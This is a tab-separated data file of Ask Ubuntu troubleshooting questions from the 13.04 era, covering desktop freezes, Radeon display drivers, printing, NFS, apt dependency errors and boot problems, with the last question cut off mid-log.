304084	ubuntu 13.04 problem with desktop	i have encountered a very interesting problem . whenever i start up my ubuntu ( unity ) : right-clicking on the desktop ( wallpaper ) does n't do anything pressing the win key ( to bring up the dash ) does n't do anything left clicking on the ubuntu icon on the left-bar brings up dash allowing to start programs normally if i have one program opened and click on minimize button , the application seemingly freezes the only way i found to 'unfreeze ' the application is to try performing another action ; sometimes i need to switch to different run-level , sometimes just using the shortcut to start terminal etc ... i tried looking at the log files ( syslog , xorg.log , kern.log ) but have n't found anything suspicious - certainly no error messages . are there any troubleshooting steps you guys could recommend ? i have n't tried gnome or different desktop environment ( i do want to find out what is going on ) . thanks in advance for any help / suggestion !
304085	how to set network connection as internet connection ?	in kubuntu 13.04 it looking as that : wired connection used for internet access on screenshot ( notice globe icon ) . how to swtich `` internet '' status from wired connection to another ?
304090	how do i install discourse on ubuntu ?	i have a spare ubuntu machine lying around and i would like to install discourse on it . how do i do this ? i 'm running ubuntu 13.04 .
304091	where 's the xorg.conf.d in 13.04 ?	what 's the path of the xorg.conf.d directory ?
304092	how can i create a custom session to use unity next and the core apps in 13.04 ?	is it possible to create a custom session that uses the unity next ui instead of unity 3d and along with it use the apps in the core apps ppa and non-core apps ppa ? . and possibly other new touch oriented 3rd party apps ? .
304097	can r600g drive 3d displays ?	can open-source radeon ( r600g ) driver output stereoscopic image to displays that support it ? is it not mentioned in radeon feature matrix ( currently down , archive link ) and i could n't find any info online . if not , can at least fglrx/catalyst do that ? in 2012 it was supported only on professional firepro boards , not consumer-grade radeon . is radeon supported now ?
304098	filco majestouch , tenkeypad not working in 13.04	i have an issue with a filco majestouch numberpad - in the fact that it freezes on a clean install of ubuntu 13.04 ( x64 ) ( finally made ubuntu my primary boot , as opposed to windows ) - if i unplug the number pad and plug it back in , it will work for all of about 2 keystrokes , then it freezes up again . rinse and repeat , i ca n't find a question similar to this anywhere so thought i 'd ask , if anyone has any ideas it would be great . also , the numberpad works perfectly fine plugged into the same usb port on the same machine when windows 7 pro 64 bit was installed . cheers
304102	how can i save my laptop 's screen brightness in ubuntu 13.04 ?	my laptop 's screen brightness returns to the high mode when i restart my computer . i wan na to find a method to save it forever . i like change my screen brightness to 40 % and save it to prevent its return to high mode ( 100 % ) in every restart .
304109	are the problems with installing ubuntu to an external hard drive fixed in ubuntu 13.04 ?	i have a macbook pro that is currently running osx . i installed ubuntu on a windows laptop i had lying around to try it out . i liked it a lot but i did n't want to commit any space to it on my internal storage on my macbook pro ( my internal storage is not very large to begin with ) . i wanted to install ubuntu to a larger external ( bootable ) hard drive . i downloaded ubuntu 12.04 ( .iso file ) , and then i burned the image to a dvd . i booted up my mac in the `` try ubuntu '' mode . then i setup my wireless connection and clicked `` install ubuntu '' . then i clicked the `` something else '' option . this is the guide i used to partition my hard drive note : i made sure to select my external hard drive ( seagate 500 gb external drive ) for the boot loader installation once i had everything partitioned correctly , i started the installation which took about 15 minutes . i rebooted my mac and it booted directly into ubuntu . i installed a bunch of updates and then i shut my computer down . i wanted to boot up osx again so i removed the hard drive and turned my computer on . it came up with the no such device : grub rescue error . here is a question about the error for those who are unfamiliar : grub rescue problem after installing ubuntu so what this means is that even know i told the installer to put the boot loader on the external hard drive , it put it on my internal hard drive . it took me days of screwing around to try to get grub off , i ended up just restoring my macbook from my time machine . this is obviously a problem in ubuntu 12.04 . it seems like if you want to install ubuntu 12.04 , you should probably just partition your internal because it has issues with installing to an external hard drive . i do n't want to install ubuntu on my internal hard drive because if i do that neither os will have a practical amount of space . now here is my question : is the problem fixed in ubuntu 13.04 ? if the problem is not fixed in 13.04 , is there a build of ubuntu where it is not a problem ? bounty how can i install ubuntu on an external usb hard drive without installing grub ( or grub2 ) onto my mac internal storage ?
304110	how to find launcher command ?	i set a launcher on the side of my ubuntu desktop a long time ago and i included a couple flags ( i think that 's what they are called ) and i would like to run the same program from the terminal using the same flags ... .but i ca n't remember what they are . how can i find what the exact command was for the launcher i created ?
304111	is it possible to stop laptop 's battery from charging ?	i use dell inspiron n4030 laptop . in win7 i was installing dell battery software that it was showing battery status and providing a tool for stopping it from charging ( when it 's connected to ac power ) in ubuntu it 's not possible to do this work and i scare to hurt my battery due to the overcharge . is there any way ?
304113	12.10 : two monitors ; one works , one only displays solid color	i have a one-day-old 12.10 install on a dell machine with an ati radeon 6450 graphics card , and two samsung monitors ( one connected through vga , one dvi ) . i also have disk encryption enabled , and i 'm using classic gnome instead of unity . this all started with a different problem , actually : when i rebooted the system , the bios would load , the purple background of what i assume was grub appeared for a few seconds , and then both screens would go into power save . at first , i got around this by simply hard-rebooting when it got `` stuck , '' and everything was fine . today , i tried hitting some random keys , and surprisingly , the disk encryption screen came up . when i logged in , however , one of my monitors ( the dvi ) worked fine , but the other ( the vga ) looked like this . ( by the way , i 'm using twinview or whatever the equivalent is ; that is , i 'm not mirroring monitors . ) the picture is n't good , but basically it 's a solid color similar to whatever color the desktop background is , with lots of slightly darker vertical lines . changing the desktop background changes this solid color . if i change to `` mirror screens , '' this monitor displays a solid gray color . initially , after one reboot , i also had to deal with a different problem where i could n't log in through x ( due to ~/.xauthority changing owners ) . while i was trying to fix that , i rebooted a couple times and messed a bit with my ~/.config/ ( deleted monitors.xml ) and /etc/x11/xorg.conf ( tried to generate a new one ) , and had some even weirder things happen , e.g . mirrored screens where one was translated about a quarter-screen to the left , and then wrapped . but now that part 's fixed , and i 'm still left with one working monitor and one solid-color monitor . to be honest , it might be easiest to just do a fresh install , but i 'm worried the same thing might just happen again ( maybe it 's a hardware thing ? ) edit : some more info -- if i change to lower resolutions , that monitor starts flashing madly ...
304118	setting the desktop colour - always black -	the setting i am constantly changing my background image , but occasionally i 'd prefer to have a plane colour like a light blue or white . the problem i right click on the desktop , select change desktop background and choose an image and instantly the desktop changes to show the selected image in full colour . however , when i choose a colour , the screen turns black , no matter what colour i choose . this happens if i choose a solid colour or a gradient my set-up i have a sony vaio , 4gib sdram , geforce 8400m gt/pcie/sse2 , 64-bit . and how can i fix it the question what would cause this problem , and how can i fix it ?
304121	how to create a dvd rip/iso ?	i am trying to create a back up of my `` chappelle 's show '' dvd collection . i believe that creating an iso would be the easiest thing to do . i have tried the brasero but could not get it to work . when using brasero this error pops up : all required applications and libraries are not installed . please install the following manually and try again : libdvdcss.so.2 ( library ) . i tried to find this library but was unsuccessful . i have also tried the programs dvd rip and acidrip and none work .
304124	default gateway setting for `` universal '' wifi adapter	the data sheet for the iogear universal wi-fi n adapter states that it supports linux ( fedora 10 ( kernel : 2.6.27.5-117 ) ) but has no directions in the manual . when setting up the static ip address using the xfce network connections gui : page 33 of the manual gives these directions ( for mac ) : select your ethernet connection in the left pane . next change configure to manual and enter ip address 192.168.1.100 and subnet mask 255.255.255.0 . remove any entries in the router and dns boxes then click apply . should the default gateway be 0.0.0.0 ? or , should it be the ip address for the router ( in this case , 192.168.0.1 ) from which the adapter obtains its internet connection ? my reading of the wikipedia page on default gateway suggests yes , but i 'm not sure . or , should it be the ip address for the adapter itself ?
304126	how can i avoid having to reset compiz/unity after each linux-headers upgrade ?	i 've been using ubuntu ( currently 13.04 ) for several months now . i was wondering if it 's typical to have to reset compiz and unity ( with dfconf reset -f /org/compiz and setsid unity ) after every linux-headers/linux-generic upgrade . right after that on the first boot , i am prompted with the desktop having no bars . i tried looking for other cleaner methods such as just re-installing the ati proprietary drivers , cleaning the compiz-1 folder , but none of them worked . is there any other way to prevent this behavior other than resetting both compiz and unity configurations ?
304129	ubuntu touch install failure ( galaxy nexus )	the command `` phablet-flash -b '' does not give enough time for my device to reboot into recovery mode before it pushes the phablet zip file across . i tried doing the command again once it finally went into recovery mode giving this result : user/downloads/phablet-flash/152 $ phablet-flash -b device detected as /sbin/sh : getprop : not found unsupported device , autodetect fails device but i can understand why that did n't work . i tried to manually push the file across myself but then it would n't deploy . are there any manual instructions i can perform under terminal to get it to continue once in recovery mode ? or is there a way to magically pause the terminal when it 's waiting for the device to reboot into recovery mode ? or where in the code can i change it from say `` sleep 5 sec '' to `` sleep 10 sec '' . i 'm also a complete noob so i apologize if i do n't understand some things . thanks a lot
304130	how to make ubuntu 64 bit to an minimal installation	i 'm using ubuntu on my vps and it needs ~40mb in idle running , that 's why i would like to clean it . my aim is to have 4mb idle running ( like with an minimal image ) . how can i do that ? thanks in advance : )
304131	do i need permission to make an ubuntu section in my computer store ?	i have a computer repair shop and i offer ubuntu as a good option for students . i want to make a section on my store focused on ubuntu , with at least 3 computers running ubuntu for discovery , practice and advice . i donât know if i need some kind of permission to do this .
304133	do n't allow an user to delete a file owned by the user	i have an ftp server with an user called `` thomas '' . every file in that ftp folder is owned by `` thomas '' . there is a file called `` screenlog.0 '' and i do n't want it to be deleted by `` thomas '' . how to revoke `` thomas '' 's access to delete that file , but he must also be able to read it . any solutions ? thanks in advance .
304139	can write review on ubuntu software center , for clamtk	for some reason i cant write a review for clamtk , it tells me '' the origin of the application can not be detected . entering a review is not possible '' however i do have it installed and have the latest version , when on the applications page in software center it even says `` remove '' , were it usually says install , so the software centre knows that it is installed on my pc , else it would say `` install '' and not remove . so does anyone know why it wont let me write review ?
304144	clean install of ubuntu wo n't boot [ reboot and select proper boot device ]	i just installed ubuntu today . i deleted everything on my hard drive , and installed ubuntu with efi-boot , swap , / and /home partition . after installing and rebooting i just get the error message from the title and i have no idea why . i put my hdd in first place in the boot options . all partitions show up fine in gparted too . i installed 13.04 64-bit . how can i troubleshoot this problem ?
304151	how do i download adobe flash on ubuntu 12.10 ?	i 'm having trouble on figuring out how to download adobe flash and adobe reader on the newest version on ubuntu 12.10 , can anyone help me ?
304152	after update , my printer will not work	i 've been successfully using an hp deskjet 1000 j100 for some time now . the other day , i updated my system ( automatic ) and my printer stopped working . i get the error message `` filter failed '' i ca n't find anything on the hp site about this . is there something that changed ? is there an obvious workaround ?
304159	not authorized to control networking	i have ubuntu 13.04 gnome with mate . if i click on the networking icon on the top tool bar and try to do something like add a never before used wifi or simply click hardwire connection 1 when i have changed to a new network , i get 'connection activation failed . ( 32 ) not authorized to control networking . ' my presumption is that i have lacking some group attribute for my user or else there is some security setting . i can make the changes if i log in as root instead of myself . what must be tweaked to allow my user name the privileges to handle this ?
304161	radeon hd mobility driver 13.1 install	looking to install the radeon hd mobility driver 13.1 on ubuntu 13.04 looking to install this driver : http : //support.amd.com/us/gpudownload/linux/legacy/pages/legacy-radeon_linux.aspx is it the same install as suggested here for 13.04 ? new to ubuntu and upon initial install i lost unity , seeing only my background .
304162	how to insert parameter into command in bash script ?	i have a bash script called `` startserver.sh '' . i call it from another file like this : sudo sh /opt/startserver.sh 400 i want to use the parameter `` 400 '' in startserver.sh like this : java -xmx400mb -jar craftbukkit-beta.jar i tried : java -xmx '' $ ( printf `` $ 1 '' ) '' mb -jar craftbukkit-beta.jar , but it did not worked . of course , without option -xmx ... .mb it works perfectly . any ideas ? thanks in advance .
304165	setting up ram disk & nfs	i’m new to linux so please forgive my lack of knowledge . what i’m trying to do is the following : create a 32gb ram disk and mount it as an nfs export and give everyone full access to it . this is what i have tried so far : ram disk mkdir –p /mnt/ramdisk chmod –r 777 /mnt/ramdisk mount –t tmpfs –o size=32g tmpfs /mnt/ramdisk/ nfs mkdir -p /exports/ramdisk chmod –r 777 /exports/ramdisk mount –bind /mnt/ramdisk /exports/ramdisk any advise would be greatly appreciated . tbone
304166	nfs server very slow when mounted separate nfs drive goes offline	we have server a serving files to users on a network via samba . it 's running out of space , so we decided to mount an nfs share ( server b ) onto server a , under our previously shared samba share . it all works well when both servers are up and running . however , if server b goes offline , server a gets reeeeeeeeaallly slow ( ~30s to open a folder , that should be unrelated to server b 's mount ) . what 's going on ?
304167	ca n't get second monitor to work : raedon hd 7470	i 'm getting confused about why it wont work . we have a dell partner , and we asked specifically for dual monitor ( *they sold us two monitors at the same time ! ) . i knew ubuntu support would be ok , , but unlikely to get any from dell itself . i ca n't get the second monitor to appear . i 've installed : fglrx : amd64 ( 9.010-0ubuntu3 ) fglrx-amdcccle : amd64 ( 9.010-0ubuntu3 , automatic ) but settings wont detect the second monitor . lachlan @ keilorpark : ~ $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos xt [ radeon hd 7470 ] 03:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos xt [ radeon hd 7470 ] lachlan @ keilorpark : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 7000 series opengl version string : 4.2.11986 compatibility profile context what am i doing wrong ? the installation advice page recommends the following for dual monitors for those that are installing the native drivers . i know i did n't , but i figured i 'd try : lachlan @ keilorpark : ~ $ sudo amdconfig -- initial -f amdconfig : no supported adapters detected i did n't even run the second line .
304174	messed up characters in pdf printed from ubuntu 12.10	when i print a particular pdf from ubuntu 12.10 , i see many garbled characters . i tried printing the same pdf from mac os x and it worked . any ideas of what i should look into to fix this ? here 's the pdf : https : //www.yousendit.com/download/wfjwognyqznmvflyrhrvag ( sha-1 checksum is 955496e5d8aea341422a61e83bf2c8867d92cebf ) . it was compiled from this very simple latex file : \documentclass [ 12pt , english ] { letter } \usepackage [ margin=.75in ] { geometry } \usepackage { babel } \begin { document } \address { sender \\ address line 1 \\ address line 2 } \letter { recipient \\ address line 1 \\ address line 2 } \signature { my full name } \opening { dear recipient , } here 's a letter for you . \closing { sincerely , } \end { document } using this command : pdflatex test.tex here 's page 1 : here 's page 2 : i got the same result from two different ubuntu 12.10 computers printing to two different printers . here 's a little more debugging info : $ pdflatex -- version pdftex 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) kpathsea version 6.1.0 copyright 2012 peter breitenlohner ( etex ) /han the thanh ( pdftex ) . there is no warranty . redistribution of this software is covered by the terms of both the pdftex copyright and the lesser gnu general public license . for more information about these matters , see the file named copying and the pdftex source . primary author of pdftex : peter breitenlohner ( etex ) /han the thanh ( pdftex ) . compiled with libpng 1.2.49 ; using libpng 1.2.49 compiled with zlib 1.2.7 ; using zlib 1.2.7 compiled with poppler version 0.20.4 here 's the .log file : this is pdftex , version 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) ( format=pdflatex 2013.1.9 ) 3 jun 2013 20:33 entering extended mode restricted \write18 enabled . % & -line parsing enabled . **test.tex ( ./test.tex latex2e < 2011/06/27 > babel < v3.8m > and hyphenation patterns for english , dumylang , nohyphenation , lo aded . ( /usr/share/texlive/texmf-dist/tex/latex/base/letter.cls document class : letter 1999/04/29 v1.2z standard latex document class ( /usr/share/texlive/texmf-dist/tex/latex/base/size12.clo file : size12.clo 2007/10/19 v1.4h standard latex file ( size option ) ) \longindentation=\dimen102 \indentedwidth=\dimen103 \labelcount=\count79 ) ( /usr/share/texlive/texmf-dist/tex/latex/geometry/geometry.sty package : geometry 2010/09/12 v5.6 page geometry ( /usr/share/texlive/texmf-dist/tex/latex/graphics/keyval.sty package : keyval 1999/03/16 v1.13 key=value parser ( dpc ) \kv @ toks @ =\toks14 ) ( /usr/share/texlive/texmf-dist/tex/generic/oberdiek/ifpdf.sty package : ifpdf 2011/01/30 v2.3 provides the ifpdf switch ( ho ) package ifpdf info : pdftex in pdf mode is detected. ) ( /usr/share/texlive/texmf-dist/tex/generic/oberdiek/ifvtex.sty package : ifvtex 2010/03/01 v1.5 detect vtex and its facilities ( ho ) package ifvtex info : vtex not detected. ) ( /usr/share/texlive/texmf-dist/tex/generic/ifxetex/ifxetex.sty package : ifxetex 2010/09/12 v0.6 provides ifxetex conditional ) \gm @ cnth=\count80 \gm @ cntv=\count81 \c @ gm @ tempcnt=\count82 \gm @ bindingoffset=\dimen104 \gm @ wd @ mp=\dimen105 \gm @ odd @ mp=\dimen106 \gm @ even @ mp=\dimen107 \gm @ layoutwidth=\dimen108 \gm @ layoutheight=\dimen109 \gm @ layouthoffset=\dimen110 \gm @ layoutvoffset=\dimen111 \gm @ dimlist=\toks15 ) ( /usr/share/texlive/texmf-dist/tex/generic/babel/babel.sty package : babel 2008/07/08 v3.8m the babel package ( /usr/share/texlive/texmf-dist/tex/generic/babel/english.ldf language : english 2005/03/30 v3.3o english support from the babel system ( /usr/share/texlive/texmf-dist/tex/generic/babel/babel.def file : babel.def 2008/07/08 v3.8m babel common definitions \babel @ savecnt=\count83 \u @ d=\dimen112 ) \l @ british = a dialect from \language\l @ english \l @ ukenglish = a dialect from \language\l @ english \l @ canadian = a dialect from \language\l @ american \l @ australian = a dialect from \language\l @ british \l @ newzealand = a dialect from \language\l @ british ) ) ( ./test.aux ) \openout1 = `test.aux ' . latex font info : checking defaults for oml/cmm/m/it on input line 5 . latex font info : ... okay on input line 5 . latex font info : checking defaults for t1/cmr/m/n on input line 5 . latex font info : ... okay on input line 5 . latex font info : checking defaults for ot1/cmr/m/n on input line 5 . latex font info : ... okay on input line 5 . latex font info : checking defaults for oms/cmsy/m/n on input line 5 . latex font info : ... okay on input line 5 . latex font info : checking defaults for omx/cmex/m/n on input line 5 . latex font info : ... okay on input line 5 . latex font info : checking defaults for u/cmr/m/n on input line 5 . latex font info : ... okay on input line 5 . *geometry* driver : auto-detecting *geometry* detected driver : pdftex *geometry* verbose mode - [ preamble ] result : * driver : pdftex * paper : < default > * layout : < same size as paper > * layoutoffset : ( h , v ) = ( 0.0pt,0.0pt ) * modes : * h-part : ( l , w , r ) = ( 54.2025pt , 505.89pt , 54.2025pt ) * v-part : ( t , h , b ) = ( 54.2025pt , 686.56499pt , 54.2025pt ) * \paperwidth=614.295pt * \paperheight=794.96999pt * \textwidth=505.89pt * \textheight=686.56499pt * \oddsidemargin=-18.06749pt * \evensidemargin=-18.06749pt * \topmargin=-75.06749pt * \headheight=12.0pt * \headsep=45.0pt * \topskip=12.0pt * \footskip=25.0pt * \marginparwidth=90.0pt * \marginparsep=11.0pt * \columnsep=10.0pt * \skip\footins=10.0pt plus 2.0pt minus 4.0pt * \hoffset=0.0pt * \voffset=0.0pt * \mag=1000 * \ @ twocolumnfalse * \ @ twosidefalse * \ @ mparswitchfalse * \ @ reversemarginfalse * ( 1in=72.27pt=25.4mm , 1cm=28.453pt ) latex font info : external font `cmex10 ' loaded for size ( font ) < 12 > on input line 9 . latex font info : external font `cmex10 ' loaded for size ( font ) < 8 > on input line 9 . latex font info : external font `cmex10 ' loaded for size ( font ) < 6 > on input line 9 . [ 1 { /var/lib/texmf/fonts/map/pdftex/updmap/pdftex.map } ] ( ./test.aux ) ) here is how much of tex 's memory you used : 995 strings out of 495059 13062 string characters out of 3182031 68184 words of memory out of 3000000 4226 multiletter control sequences out of 15000+200000 6376 words of font info for 23 fonts , out of 3000000 for 9000 14 hyphenation exceptions out of 8191 25i,6n,32p,170b,104s stack positions out of 5000i,500n,10000p,200000b,50000s < /usr/share/ texlive/texmf-dist/fonts/type1/public/amsfonts/cm/cmr12.pfb > output written on test.pdf ( 1 page , 14134 bytes ) . pdf statistics : 12 pdf objects out of 1000 ( max . 8388607 ) 7 compressed objects within 1 object stream 0 named destinations out of 1000 ( max . 500000 ) 1 words of extra memory for pdf output out of 10000 ( max . 10000000 ) here 's info on printer # 1 ... make and model : brother mfc-8840d br-script3 device uri : ipp : //192.168.1.9:631/printers/brother ( it is connected via usb to an ubuntu 12.04.2 machine , and i print to it over the network ) printer # 2 ( more info in a few hours ) ... make and model : tbd device uri : tbd
304178	how do i add a ppa in a shell script without user input ?	basically , i want to run add-apt-repository ppa : ( whatever ) without the `` press enter to continue '' prompt . how would i do this ? essentially , i want to deploy adding a repository in a shell script without user input .
304182	how do i find the information i need to diagnose a slow wireless problem ?	i have seen a number of questions on this site regarding slow wireless problems . many of them discuss problems relative to specific wireless cards . could someone please explain to me how to find out what wireless card i have in order to begin to diagnose the problem ? what other information might i need and how do i find that ?
304183	install ubuntu 13.04 on dell inspiron mini	i have a birthday coming up & may be getting this laptop : http : //www.amazon.com/dell-inspiron-im1012-799obk-10-1-inch-obsidian/dp/b0030t17dw/ref=sr_1_1 ? ie=utf8 & qid=1370392908 & sr=8-1 & keywords=dell+inspiron+mini any instructions on how to install ?
304191	why does ubuntu 12.04 lts provide samba4 alpha ?	i was surprised to see an alpha package in an lts release . why put such an alpha package in an lts release , no matter how stable it can be ? it can be misleading for careless people who didn ' t check the version number in detail .
304194	control fan speed command line	after running service kmod start i get this error : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.77 '' ( uid=1000 pid=2871 comm= '' start kmod `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) does anyone know what this means and how i can fix it ?
304197	3840x2160 resolution with radeon hd 7870 not working	i just got a seiki 4k monitor . i am trying to get it to run at full resolution but so far no luck . it defaults to 1080i 60hz . this review says it works by adding a mode with xrandr but he is using a different video card then me : i am using a radeon hd 7870 with the fglrx-updates fglrx-amdcccle-updates on 13.04 . i followed the advice in the review and added a new mode with xrandr but when i try to change the output i get : xrandr : configure crtc 0 failed when i try to switch using amdcccle i get : the current settings can not be applied . possible issues may include : - display ( s ) can not be enabled . - setting ( s ) can not be applied due to insufficient video memory . the video card definitely supports 4k resolutions and i know it 's possible to get it working on linux . i just ca n't figure out how to get it to work for me . any help would be appreciated .
304201	what are all the autostart locations in ubuntu ?	i 'm a ubuntu newbie in need of some advice from anyone very familiar with the different ubuntu startup methodologies . i 'm interested in enumerating all the applications that are triggered at startup on any given install of ubuntu 13.04 or higher . i know there is a wide variety of ways that a script or application can be launched at boot time , but i would like to be sure that i have a comprehensive list for all autostart config locations . the end goal is to write a script that iterates through all the config locations , then spits out a list of all things triggered between power on and when the desktop is ready to use . so far i know about : upstart , example config file : /etc/init.d/foo autostart ( system ) , example config file : /etc/xdg/autostart/foo.desktop autostart ( profile ) , example config file : ~/.config/autostart/foo.desktop cron 's @ reboot , example config file : /var/spool/cron/crontabs is there any other way that an application can inject itself into the overall system startup sequence or are the possibilities endless ? examples of apps that you might consider when answering , that i imagine could have a nonstandard startup : antivirus software , malware , daemon , custom script , production software - free / nonfree , binaries , indicators , dropbox , etc . is there an application already available that will enumerate iterally everything that runs at boot ? thanks , any help is appreciated .
304204	how to create a system-wide environmental variable ?	i want to set an environmental variable that all users will have , where do i do this ? this is for users who login and also for certain processes that run under an account .
304208	after upgrade to 13.04 , screen is flipped - text is left-to-right but upside down	i upgraded to 13.04 last night . when i rebooted and logged in , this is what i saw . how can i fix this ?
304212	how to solve `` sudo : /etc/sudoers.d is world writable ''	how can i fix the following error with sudo ? /etc $ sudo sudo : /etc/sudoers.d is world writable usage : sudo [ -d level ] -h | -k | -k | -v usage : sudo -v [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] usage : sudo -l [ l ] [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name ] [ -u user name| # uid ] [ -g groupname| # gid ] [ command ] usage : sudo [ -abehknps ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] [ -g groupname| # gid ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -r role ] [ -t type ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] file ...
304220	ubuntu 12.04 server can not reboot on its own after reinstallation	we reinstalled the ubuntu 12.04 server after power outrage . after reinstallation , the server can not reboot on its own . here is the current manual reboot procedure : after reboot now , the server powers up . after boot up menu ( top 2 are boot into regular or recovery mode ) , the server goes directly into blank screen and hung ( keystroke does not matter ) . hit control-alt-delete to restart again . this time the server will pass the bootup menu and stops at attached scsi disk . after hitting enter , the server goes into prompt initramfs . after typing exit , the server will go to the login screen . login . what 's wrong with the ubuntu 12.04 server and how to fix it ? thanks for help . /var/log/boot.log fsck from util-linux 2.20.1 fsck from util-linux 2.20.1 /dev/mapper/ubuntu -- ibm-root : clean , 101595/8634368 files , 1177251/34523136 blocks /dev/sda1 : clean , 230/124496 files , 40645/248832 blocks * starting cups printing spooler/server [ ok ] * starting load fallback graphics devices [ ok ] * starting userspace bootsplash [ ok ] * starting send an event to indicate plymouth is up [ ok ] * stopping load fallback graphics devices [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * stopping cold plug devices [ ok ] * stopping log initial device creation [ ok ] * starting configure network device security [ ok ] * starting save udev log and update rules [ ok ] * stopping save udev log and update rules [ ok ] * stopping userspace bootsplash [ ok ] * stopping openssh server [ ok ] * starting openssh server [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * stopping failsafe boot delay [ ok ] * starting system v initialisation compatibility [ ok ] * starting set sysctls from /etc/sysctl.conf [ ok ] * stopping set sysctls from /etc/sysctl.conf [ ok ] * starting configure network device [ ok ] skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] * stopping system v initialisation compatibility [ ok ] * starting system v runlevel compatibility [ ok ] * starting crash report submission daemon [ ok ] * starting automatic crash report generation [ ok ] * starting acpi daemon [ ok ] * starting save kernel messages [ ok ] * starting cpu interrupts balancing daemon
304221	getting dpkg-buildpackage depencency errors when using apt-get install source -- compile	i was playing around with apt-get install source -- compile and i used audacity : sudo apt-get install source -- compile audacity however , i am getting a dependency error : dpkg-checkbuilddeps : unmet build dependencies : autoconf automake debhelper ( > = 7.0.50~ ) libasound2-dev libavcodec-dev ( > = 4:0.6 ) libavformat-dev ( > = 4:0.6 ) libavutil-dev ( > = 4:0.6 ) libexpat1-dev libflac++-dev libgtk2.0-dev libid3tag0-dev libjack-dev libmad0-dev ( > = 0.14.2b ) libmp3lame-dev libogg-dev ( > = 1.0.0 ) libportsmf-dev libsbsms-dev ( > = 2.0.0 ) libsndfile1-dev ( > = 1.0.0 ) libsoundtouch-dev ( > = 1.3.1-2 ) libsoxr-dev ( > = 0.0.5 ) libtwolame-dev ( > = 0.3.9 ) libvorbis-dev ( > = 1.0.0-3 ) libwxgtk2.8-dev portaudio19-dev ( > = 19+svn20101113-3~ ) vamp-plugin-sdk ( > = 2.0 ) dpkg-buildpackage : warning : build dependencies/conflicts unsatisfied ; aborting dpkg-buildpackage : warning : ( use -d flag to override . ) build command 'cd audacity-2.0.3 & & dpkg-buildpackage -b -uc ' failed . e : child process failed unmet build dependencies makes me believe dpkg is the one with missing dependencies , but i 'm really not sure . installing audacity with sudo apt-get install audacity works just fine , so i do n't think this is audacity 's issue . i 've seen this question : how do i resolve unmet dependencies ? , but i 'm not sure if that applies to this or not .
304222	editing manpath from /etc/environment	having installed tex live on my system ( by downloading and running the script from tug 's website : http : //www.tug.org/texlive/acquire-netinstall.html ) , i tried editing the manpath variable by adding the following line in my /etc/environment : manpath= $ manpath : /usr/local/texlive/2012/texmf/doc/man ( there was no manpath entry previously ) however , setting the manpath here seems to be overriding the /etc/manpath.config file , and thus the system manual pages are no longer found . whereas , if i use export in my .bashrc , mandb prepends the content of manpath.config to the exported value . what is wrong with this syntax ? after all , https : //help.ubuntu.com/community/environmentvariables does say that /etc/environment is the place for setting system-wide environment variables the same issue for infopath
304223	how do i convert dyn dynamic external ip-address to ubuntu 13.04 internal ip-address	how do i convert dyn dynamic external ip-address to ubuntu 13.04 internal ip-address i have isc-dhcp-server apache2 dns ubuntu 13.04 netcomm 3g-sim card router i am using ddclient to obtain the dyndns dynamic records - this comes up as my external ip-address - ineed to convert this to an internal ip-address for apache2 and dhcp-server
304232	loaded ati driver and now all i have is the desktop . how do i get everything back ?	i am running 13.04 and decided to upgrade from the onboard video on my motherboard to a new ati hd6570 card . i downloaded the latest drivers from amd and installed them and switched the bios to default to the pcie card . ubuntu loads , but all i get is the desktop with my single icon for steam , nothing else . the bar of icons and the launcher on the left are gone as is the bar at the top . any ideas how to get everything back ?
304234	how to clean up a messed up apt-get ?	question : i wanted to do dist-upgrade on my server this morning . what i got is this : apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-extra-3.5.0-32-generic : depends : linux-image-3.5.0-32-generic but it is not installed linux-image-generic : depends : linux-image-3.5.0-32-generic but it is not installed e : unmet dependencies . try using -f. after that i tried to install linux-image-3.5.0-32-generic , and this is what happened : apt-get install linux-image-3.5.0-32-generic reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.5.0-22 linux-headers-3.5.0-22-generic linux-headers-3.5.0-23 linux-headers-3.5.0-23-generic linux-headers-3.5.0-25 linux-headers-3.5.0-25-generic linux-headers-3.5.0-26 linux-headers-3.5.0-26-generic linux-headers-3.5.0-27 linux-headers-3.5.0-27-generic linux-headers-3.5.0-28 linux-headers-3.5.0-28-generic linux-headers-3.5.0-30 linux-headers-3.5.0-30-generic use 'apt-get autoremove ' to remove them . suggested packages : fdutils linux-doc-3.5.0 linux-source-3.5.0 linux-tools the following new packages will be installed : linux-image-3.5.0-32-generic 0 upgraded , 1 newly installed , 0 to remove and 16 not upgraded . 8 not fully installed or removed . need to get 12.0 mb of archives . after this operation , 32.7 mb of additional disk space will be used . get:1 http : //ch.archive.ubuntu.com/ubuntu/ quantal-updates/main linux-image-3.5.0-32-generic amd64 3.5.0-32.53 [ 12.0 mb ] fetched 12.0 mb in 5s ( 2,307 kb/s ) ( reading database ... 316189 files and directories currently installed . ) unpacking linux-image-3.5.0-32-generic ( from ... /linux-image-3.5.0-32-generic_3.5.0-32.53_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.5.0-32-generic_3.5.0-32.53_amd64.deb ( -- unpack ) : can not copy extracted data for './boot/system.map-3.5.0-32-generic ' to '/boot/system.map-3.5.0-32-generic.dpkg-new ' : failed to write ( no space left on device ) no apport report written because the error message indicates a 